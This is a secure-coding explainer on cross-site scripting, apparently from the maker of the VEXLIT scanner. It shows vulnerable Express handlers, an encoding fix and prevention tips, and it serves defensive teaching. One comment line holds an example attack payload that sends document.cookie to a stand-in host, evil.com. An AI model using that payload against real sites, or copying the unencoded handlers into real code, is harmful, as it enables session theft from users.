Cross-Site Scripting (CWE-79)
XSS allows attackers to inject malicious scripts into web pages viewed by other users. It's the most widespread web vulnerability, affecting an estimated 65% of all websites.
How XSS Works
An attacker injects malicious JavaScript into a web page. When other users view the page, the script executes in their browser, stealing cookies, session tokens, or redirecting to phishing sites.
Reflected XSS
// User input reflected in response without encoding
app.get('/search', (req, res) => {
const query = req.query.q;
res.send(`<h1>Results for: ${query}</h1>`);
});
// Attack: /search?q=<script>document.location='evil.com?c='+document.cookie</script>Stored XSS
// User input stored and rendered to other users
app.post('/comment', (req, res) => {
db.insert({ text: req.body.comment }); // Stored as-is
});
// Later rendered without encoding:
// <div>{comment.text}</div> // XSS!Secure Code
// Output encoding prevents script execution
import { escape } from 'html-escaper';
app.get('/search', (req, res) => {
const query = escape(req.query.q);
res.send(`<h1>Results for: ${query}</h1>`);
});
// React auto-escapes by default:
// <div>{comment.text}</div> // Safe in JSXTypes of XSS
Reflected XSS: Malicious input reflected in the immediate response
Stored XSS: Malicious input saved in the database and shown to other users
DOM-based XSS: Vulnerability in client-side JavaScript that modifies the DOM
Prevention
- Encode output: HTML-encode all user input before rendering
- Use frameworks with auto-escaping (React, Angular, Vue)
- Set Content-Security-Policy headers to block inline scripts
- Use HttpOnly and Secure flags on cookies
- Sanitize HTML input with DOMPurify or similar libraries
VEXLIT Detection
VEXLIT traces user input from HTTP sources through template rendering and response output. Framework-specific rules detect unsafe patterns in Express res.send(), Django render(), React dangerouslySetInnerHTML, and 30+ other frameworks.
npx @vexlit/cli scan . --fail-on warning